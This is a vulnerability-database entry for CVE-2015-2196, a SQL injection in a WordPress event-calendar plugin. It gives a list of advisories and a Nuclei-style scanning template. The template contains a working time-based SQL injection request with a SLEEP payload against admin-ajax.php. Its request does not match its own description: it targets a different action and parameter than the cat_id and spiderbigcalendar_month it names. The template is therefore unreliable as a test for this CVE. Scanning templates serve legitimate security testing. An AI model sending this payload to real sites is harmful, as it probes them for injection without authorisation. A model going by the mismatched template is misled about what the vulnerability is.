| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2015-2196 | 13 Feb 2015 00:00 | – | circl |
| WordPress Plugin Spider Event Calendar SQL Injection Vulnerability | 4 Mar 2015 00:00 | – | cnvd |
| WordPress Webdorado Spider Event Calendar Plugin SQL Injection (CVE-2015-2196) | 25 Jan 2016 00:00 | – | checkpoint_advisories |
| CVE-2015-2196 | 3 Mar 2015 19:00 | – | cve |
| CVE-2015-2196 | 3 Mar 2015 19:00 | – | cvelist |
| EUVD-2015-2303 | 7 Oct 2025 00:30 | – | euvd |
| KLA10491 Multiple vulnerabilities in WordPress plugins | 17 Mar 2015 00:00 | – | kaspersky |
| CVE-2015-2196 | 3 Mar 2015 19:59 | – | nvd |
| WordPress Webdorado Spider Event Calendar SQL Injection | 9 Mar 2015 00:00 | – | openvas |
| WordPress Web Dorado Spider Event Calendar Plugin 1.4.9 - SQL Injection | 13 Feb 2015 00:00 | – | patchstack |
```yaml
id: CVE-2015-2196

info:
  name: WordPress Spider Calendar <=1.4.9 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or complete compromise of the WordPress site.
  remediation: Fixed in version 1.4.14.
  reference:
    - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad
    - https://wordpress.org/plugins/spider-event-calendar/
    - http://www.exploit-db.com/exploits/36061
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2196
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2015-2196
    cwe-id: CWE-89
    epss-score: 0.11182
    epss-percentile: 0.95387
    cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: web-dorado
    product: spider_calendar
    framework: wordpress
  tags: time-based-sqli,cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado,vuln

http:
  - raw:
      - |
        @timeout 10s
        GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code == 200'
          - 'contains(body, "{\"status\":true,\"data\"")'
        condition: and
# digest: 4a0a0047304502203974122c625d10fe4da3787b86cbad73fbbde47805d931b80810a737704182c1022100b75045fb1a45f1009c93797683af2e3d928135e79b035743ef61c8420474573d:922c64590222798bb761d5b6d8e72950
```